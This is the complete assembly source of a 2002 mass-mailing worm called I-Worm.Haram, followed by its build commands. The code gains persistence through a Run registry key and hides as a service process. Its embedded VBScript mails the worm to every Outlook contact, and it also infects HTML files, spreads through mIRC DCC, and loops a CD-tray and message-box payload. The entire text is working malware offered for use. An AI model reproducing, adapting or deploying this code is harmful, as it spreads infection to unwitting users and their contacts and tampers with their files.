comment * Name : I-Worm.Haram Author : PetiK Language : win32asm Date : May 13th 2002 - June 1st 2002 Size : 5192 bytes (compressed with Petite Tool) Comments : - Copy to %sysdir%\FunnyGame.exe - Search all doc files in "Personal" folder and create a new virus html file: example : document.doc -> document.htm 1) 2) 1) Good DOC file 2) Good HTM virus (1571 bytes) - Put the name of all active process and add .htm: example : process.exe -> process.exe.htm 3) 4) 3) Real name of active process 4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP) - Create a random name file in StarUp folder to spread with Outlook - On the 10th, payload : open and close CD door and display a messagebox in loop * .586p .model flat .code JUMPS include LF equ 10 CR equ 13 CRLF equ <13,10> @pushsz macro msg2psh, empty local next_instr ifnb <empty> %out too much arguments in macro '@pushsz' .err endif call next_instr db msg2psh,0 next_instr: endm @endsz macro local nxtchr nxtchr: lodsb test al,al jnz nxtchr endm api macro a extrn a:proc call a endm WIN32_FIND_DATA struct dwFileAttributes dd 0 ftCreationTime dd ?,? ftLastAccessTime dd ?,? ftLastWriteTime dd ?,? nFileSizeHigh dd 0 nFileSizeLow dd 0 dwReserved0 dd 0,0 cFileName db 260 dup(0) cAlternateFileName db 14 dup(0) db 2 dup (0) WIN32_FIND_DATA ends PROCESSENTRY32 STRUCT dwSize DWORD ? cntUsage DWORD ? th32ProcessID DWORD ? th32DefaultHeapID DWORD ? th32ModuleID DWORD ? cntThreads DWORD ? th32ParentProcessID DWORD ? pcPriClassBase DWORD ? dwFlags DWORD ? szExeFile db 260 dup(?) PROCESSENTRY32 ENDS start: pushad @SEH_SetupFrame <jmp end_worm> hide_the_worm: call hide_worm get_name: push 50 mov esi,offset orgwrm push esi push 0 api GetModuleFileNameA get_copy_name: mov edi,offset cpywrm push edi push 50 push edi api GetSystemDirectoryA add edi,eax mov eax,'nuF\' stosd mov eax,'aGyn' stosd mov eax,'e.em' stosd mov eax,'ex' stosd pop edi copy_worm: push 1 push edi push esi api CopyFileA test eax,eax je ok_copy push 50 push edi push 1 @pushsz "Haram" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push 50 push offset msgwrm push esi api GetFileTitleA push 10h push offset msgwrm @pushsz "ERROR : this file is not a valid Win32 file." push 0 api MessageBoxA ok_copy: call inf_doc_personal get_startup_path: push 0 push 7 push offset startup push 0 api SHGetSpecialFolderPathA push offset startup api SetCurrentDirectoryA call cr_vbsname mov edi,offset vbsname push 0 push 1 push 2 push 0 push 1 push 40000000h push edi api CreateFileA mov ebp,eax push 0 push offset byte_write push e_vbs - s_vbs push offset s_vbs push ebp api WriteFile push ebp api CloseHandle payload: mov eax,offset sysTime push eax api GetSystemTime lea eax,sysTime cmp word ptr [eax+6],10 jne end_payload xor eax,eax push eax push eax push eax @pushsz "set CDAudio door open" api mciSendStringA push 500 api Sleep xor eax,eax push eax push eax push eax @pushsz "set CDAudio door closed" api mciSendStringA push 40h @pushsz "I-Worm.Haram" @pushsz "Coded by PetiK - �2002 - France" push 0 api MessageBoxA api GetTickCount push 10000 pop ecx xor edx,edx div ecx inc edx mov ecx,edx push ecx api Sleep jmp payload end_payload: call inf_process end_worm: @SEH_RemoveFrame popad push 0 api ExitProcess hide_worm Proc pushad @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" ; Registered as Service Process push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP Spread_Mirc Proc push offset cpywrm push offset mirc_exe api lstrcpy call @mirc db "C:\mirc\script.ini",0 db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft. db "C:\progra~1\mirc\script.ini",0 db "C:\progra~1\mirc32\script.ini",0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov ebp,eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push ebp api WriteFile push ebp api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: ret Spread_Mirc EndP inf_doc_personal Proc pushad get_personal_folder: push 0 push 5 push offset personal push 0 api SHGetSpecialFolderPathA push offset personal api SetCurrentDirectoryA fff_doc: push offset ffile @pushsz "*.doc" api FindFirstFileA inc eax je end_f_doc dec eax mov [hfind],eax cr_file: push offset ffile.cFileName push offset new_file api lstrcpy mov esi,offset new_file push esi api lstrlen add esi,eax sub esi,4 ; to become \SYSTEM\Wsock32 mov [esi],"mth." lodsd push 0 push 1 push 2 push 0 push 1 push 40000000h push offset new_file api CreateFileA mov ebp,eax push 0 push offset byte_write push e_htm - s_htm push offset s_htm push ebp api WriteFile push ebp api CloseHandle fnf_doc: push offset ffile push [hfind] api FindNextFileA test eax,eax jne cr_file push [hfind] api FindClose end_f_doc: popad ret inf_doc_personal EndP inf_process Proc popad create_folder: push 0 @pushsz "C:\backup" api CreateDirectoryA @pushsz "C:\backup" api SetCurrentDirectoryA enum_process: push 0 push 2 api CreateToolhelp32Snapshot mov lSnapshot,eax inc eax je end_inf_process lea eax,uProcess mov [eax.dwSize], SIZE PROCESSENTRY32 lea eax,uProcess push eax push lSnapshot api Process32First check_process: test eax,eax jz end_process push ecx mov eax,ProcessID push offset uProcess cmp eax,[uProcess.th32ProcessID] je NextProcess lea ebx,[uProcess.szExeFile] push ebx push offset new_name api lstrcpy mov edi,offset new_name push edi api lstrlen add edi,eax mov eax,"mth." stosd xor eax,eax stosd push offset new_name @pushsz "System.htm" api lstrcmp test eax,eax jz NextProcess push 0 push 1 push 2 push 0 push 1 push 40000000h push offset new_name api CreateFileA mov ebp,eax push 0 push offset byte_write push e_htm - s_htm push offset s_htm push ebp api WriteFile push ebp api CloseHandle NextProcess: push offset uProcess push lSnapshot api Process32Next jmp check_process end_process: push lSnapshot api CloseHandle end_inf_process: pushad ret inf_process EndP cr_vbsname Proc mov edi,offset vbsname ; api GetTickCount push 10 pop ecx ; xor edx,edx ; div ecx ; inc edx ; mov ecx,edx name_g: push ecx api GetTickCount push '9'-'0' pop ecx xor edx,edx div ecx xchg eax,edx add al,'0' stosb api GetTickCount push 100 pop ecx xor edx,edx div ecx push edx api Sleep pop ecx loop name_g mov eax,"sbv." stosd ret cr_vbsname EndP .data ffile WIN32_FIND_DATA <?> sysTime db 16 dup(0) uProcess PROCESSENTRY32 <?> ProcessID dd ? lSnapshot dd ? new_name db 100 dup (?) orgwrm db 50 dup (0) cpywrm db 50 dup (0) msgwrm db 50 dup (0) startup db 70 dup (0) personal db 70 dup (0) new_file db 90 dup (0) vbsname db 20 dup (0) byte_write dd ? hfind dd ? s_mirc: db "[script]",CRLF db ";Don't edit this file.",CRLF,CRLF db "n0=on 1:JOIN:{",CRLF db "n1= /if ( $nick == $me ) { halt }",CRLF db "n2= /.dcc send $nick " mirc_exe db 50 dup (?) db CRLF,"n3=}",0 e_mirc: s_htm: db '<haram>',CRLF db '<html><head><title>Windows Media Player</title></head><body>',CRLF db '<script language=VBScript>',CRLF db 'On Error Resume Next',CRLF db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF db 'If err.number=429 Then',CRLF db 'kupfkvqg.Run javascript:location.reload()',CRLF db 'Else',CRLF,CRLF db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF db 'End If',CRLF,CRLF db 'Function glvqglvb(dir)',CRLF db 'If upfkupfk.FolderExists(dir) Then',CRLF db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF db ' Set bbblvqgl=bbbbbbbb.Files',CRLF db ' For each lvqgvqgl in bbblvqgl',CRLF db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF db ' rhmwrrhm.Close()',CRLF db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF db ' htmorg=rhmwrrhm.ReadAll()',CRLF db ' rhmwrrhm.Close()',CRLF db ' Set mwrrhmwr=document.body.createTextRange',CRLF db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF db ' rhmwrrhm.WriteLine "<haram>"',CRLF db ' rhmwrrhm.Write(htmorg)',CRLF db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF db ' rhmwrrhm.Close()',CRLF db ' Else',CRLF db ' rhmwrrhm.Close()',CRLF db ' End If',CRLF db ' End If',CRLF db ' Next',CRLF db 'End If',CRLF db 'End Function',CRLF db '</script></body></html>',0 e_htm: s_vbs: db 'On Error Resume Next',CRLF db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF db 'Set sys = terqne.GetSpecialFolder(1)',CRLF db 'copyname = sys&"\FunnyGame.exe"',CRLF db 'Set htgx = CreateObject("Outlook.Application")',CRLF db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF db 'For each c In ofcc.AddressLists',CRLF db 'If c.AddressEntries.Count <> 0 Then',CRLF db 'For d = 1 To c.AddressEntries.Count',CRLF db 'Set etldb = htgx.CreateItem(0)',CRLF db 'etldb.To = c.AddressEntries(d).Address',CRLF db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF db 'etldb.Attachments.Add(copyname)',CRLF db 'etldb.DeleteAfterSubmit = True',CRLF db 'If etldb.To <> "" Then',CRLF db 'etldb.Send',CRLF db 'End If',CRLF db 'Next',CRLF db 'End If',CRLF db 'Next',0 e_vbs: ends end start ************************************************************************* @tasm32 /M /ML haram.asm @tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def rem pause rem upx -9 haram.exe @del *.obj rem pause ************************************************************************* IMPORTS SHLWAPI.SHSetValueA SHELL32.SHGetSpecialFolderPathA